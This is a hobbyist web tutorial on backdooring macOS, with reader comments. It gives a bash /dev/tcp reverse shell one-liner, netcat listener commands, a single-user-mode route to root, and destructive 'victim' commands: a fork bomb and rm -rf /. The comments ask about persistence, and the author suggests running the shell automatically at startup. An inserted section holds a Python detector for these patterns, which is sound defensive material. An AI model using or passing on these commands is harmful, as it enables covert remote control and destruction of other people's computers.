How To: Create Backdoor on OSX


Hello, ladies and gents! Today I will be discussing the fun and excitement of backdooring an OSX system.

Note: A lot of what I am going to say is based directly on this article by Patrick Mosca. Please give him your gratitude and leave mine at the door!

Step 1: Reverse Shell

A reverse shell is the first step to our backdoor on the OSX system.
With a reverse shell, the target computer connects out to us, rather than us having to connect in to it.

We can create a reverse shell with a simple one-line command on the target system. (Yes, sadly, this has to be typed on the target system.)

bash -i >& /dev/tcp/youripaddress/1337 0>&1

Fantastic! Your reverse shell has been created. If we want to gain root access, we can use our Swiss Army knife of penetration testing tools, netcat.

On Kali Linux, type:
nc -l -p 1337

If you are using an OSX system for penetration testing (for some reason), type this:
nc -l 1337

If you did everything correctly, you should see a command line prompt similar to the following:

bash-3.2$

Step 2: Test Your Door

Let's make sure our backdoor has working hinges and a working doorknob. Don't think too hard about what I just said; that was a joke.

Here are some fun things you can do with your backdoor:

1. Make the victim computer talk.

This is probably the easiest and funniest trick in the book. Just type:
say (Whatever you want the computer to say)

If the volume is turned down on the victim computer, no words will be heard. To fix this, turn the volume all the way up!

osascript -e 'set volume 7'

2. Open links.

That's right. Remember that fantasy you had where you were a top-notch hacker and you opened a thousand links of Nyan Cat on a government computer?

Well, you can do the same thing here, but instead of a government computer it would be a computer that you have permission to execute attacks on. (You evil little thing).

Simply type:
open (link)

Note: Your link MUST start with http://www. for this to work.

3. Navigate to directories

This one is probably going to be the most useful to know.

ls lists all of the files and folders contained in a directory.
cd opens a folder or directory.

4. Deadly commands

Here I will talk briefly about some serious "do not try this at home" commands.

I am not responsible for anything idiotic you do.

Note: Some, if not most, of these commands require root permissions. If you want the backdoor to have root access, run the reverse shell command from single-user mode. To boot into single-user mode, hold Command-S while the victim computer starts up.

Fork Bomb:

A fork bomb is a process that replicates itself indefinitely until the computer runs out of resources and crashes.

A fork bomb is made by typing:
:(){ :|:& };:

Note: I am not sure that this works on Mac. Don't test it out, though. Seriously.

Erase EVERYTHING:

Okay, no explanation needed:
rm -rf /
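From the defender's side, every command in Step 1 and in this "deadly commands" section leaves a recognisable fingerprint in shell history and in process listings: the bash-only /dev/tcp pseudo-device with a host and port, a function that pipes into itself and backgrounds the result, and rm with a recursive flag pointed at the filesystem root. The following script is an added example (not part of the original tutorial or Patrick Mosca's article) that scans a handful of constructed command lines, of the kind you would pull from ~/.bash_history or from `ps -axo command=` on a Mac you are checking, and flags the three patterns. The sample lines, the IP addresses in them, and the pattern names are all assumptions made up for the demonstration.

```python
import re

# Constructed sample command lines, as a defender might collect them from
# ~/.bash_history or `ps -axo command=` on a Mac under review.  Not real data;
# 203.0.113.0/24 is a documentation range, so these addresses route nowhere.
SAMPLE_LINES = [
    "ls -la ~/Documents",
    "bash -i >& /dev/tcp/203.0.113.5/1337 0>&1",
    "cd /Applications",
    ":(){ :|:& };:",
    "open http://www.example.com",
    "sudo rm -rf /",
    "exec 5<>/dev/tcp/203.0.113.9/4444",
]

# Label -> regex.  Labels are this example's own names, not any tool's.
PATTERNS = {
    # bash's /dev/tcp/<host>/<port> (or /dev/udp) pseudo-device, which is the
    # heart of the tutorial's one-liner; any use of it is worth a look.
    "reverse_shell_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # A function whose body pipes the function into itself and backgrounds it,
    # then is invoked: the classic fork bomb shape, with any function name.
    "fork_bomb": re.compile(
        r"(\w+|:)\s*\(\)\s*\{\s*\1\s*\|\s*\1\s*&\s*\}\s*;\s*\1"
    ),
    # rm with at least one flag group containing r/R, and a bare "/" target.
    "recursive_root_delete": re.compile(
        r"\brm\s+(?:-[a-zA-Z]+\s+)*-[a-zA-Z]*[rR][a-zA-Z]*\s+(?:-[a-zA-Z]+\s+)*/(?:\s|$)"
    ),
}


def classify(line):
    """Return the labels of every pattern that matches this command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(line)]


def dev_tcp_endpoint(line):
    """Return (host, port) from a /dev/tcp or /dev/udp path, or None."""
    m = re.search(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d+)", line)
    if not m:
        return None
    return m.group(1), int(m.group(2))


def scan(lines):
    """Return a list of (line, labels) for every line that trips a pattern."""
    hits = []
    for line in lines:
        labels = classify(line)
        if labels:
            hits.append((line, labels))
    return hits


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_LINES):
        endpoint = dev_tcp_endpoint(line)
        extra = f"  -> {endpoint[0]}:{endpoint[1]}" if endpoint else ""
        print(f"{', '.join(labels):24} {line}{extra}")
```

The reverse-shell pattern deliberately matches any /dev/tcp use rather than the exact one-liner, because the same redirection trick works with other shells' wording; when it fires, dev_tcp_endpoint gives you the host and port to check against firewall or NetFlow records. The rm pattern only fires for a bare "/" target, so routine "rm -rf /tmp/build" lines do not generate noise.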

Step 3: Conclusion

Everyone run! The cyber revolution has taken over! Destroy the computers!

Just kidding.

The one main flaw in this attack is that the target system has to execute a command first. So, there is a simple "patch":

  1. Don't give your computer to strangers
  2. Don't leave your computer out in the open
  3. Don't run commands that you don't understand

I hope you enjoyed this tutorial! As always, leave any questions or disagreements in the comment section!
-- Cameron

16 Comments

Hey! Thank you for your great tutorial! Is it possible to make that script work on every computer start? Thank you

How to make wan plz?

How can I make this persistent?

There are ways to make this persistent. Think about adding a script or process that will automatically run this command whenever the computer is turned on.

Hey thanks for the awesome guide! I have a quick question, in the cmd:

bash -i >&/dev/tcp/youripadress/1337 0>&1

I don't use my MAC address, right? And do I need a wireless adapter to create and use a backdoor like this?

Sorry if these are stupid questions, I'm a beginner.

Thanks for leaving a comment. You do not use your MAC address, but your IP address instead. Also, you do not need any external wireless card to do this.

I keep getting an error in the OSX terminal saying:

-bash: connect: Operation timed out
-bash: /dev/tcp/00.00.000.00/1337: Operation timed out

(I edited out my IP for the purpose of posting the cmd line here)

I'm not sure what I'm doing wrong.

Hey great tutorial. Can you explain how that command works though? The bash -i one. I got it to work but I want to understand it.

When I tried bash -i >& /dev/tcp/youripaddress/1337 0>&1 on my mac I got a connection refused response.

I went into my AirPort and allowed access to the 1337 port.

Now when I run bash -i >& /dev/tcp/youripaddress/1337 0>&1 I get a Network is unreachable response.

My public IP address is the same for all devices on my network.

Hello, same here when trying from host OSX to Kali guest VM.
Anyway, if I try with the address of another (Windows) PC on the network it seems to work.

Is that related to the network interface?

Thanks

I like your tutorials like my mom, but can you do this command on Windows? Thanks

How can I remove the backdoor? I want to try it out on my other MacBook, but first I want to know how you remove it. Thank you.
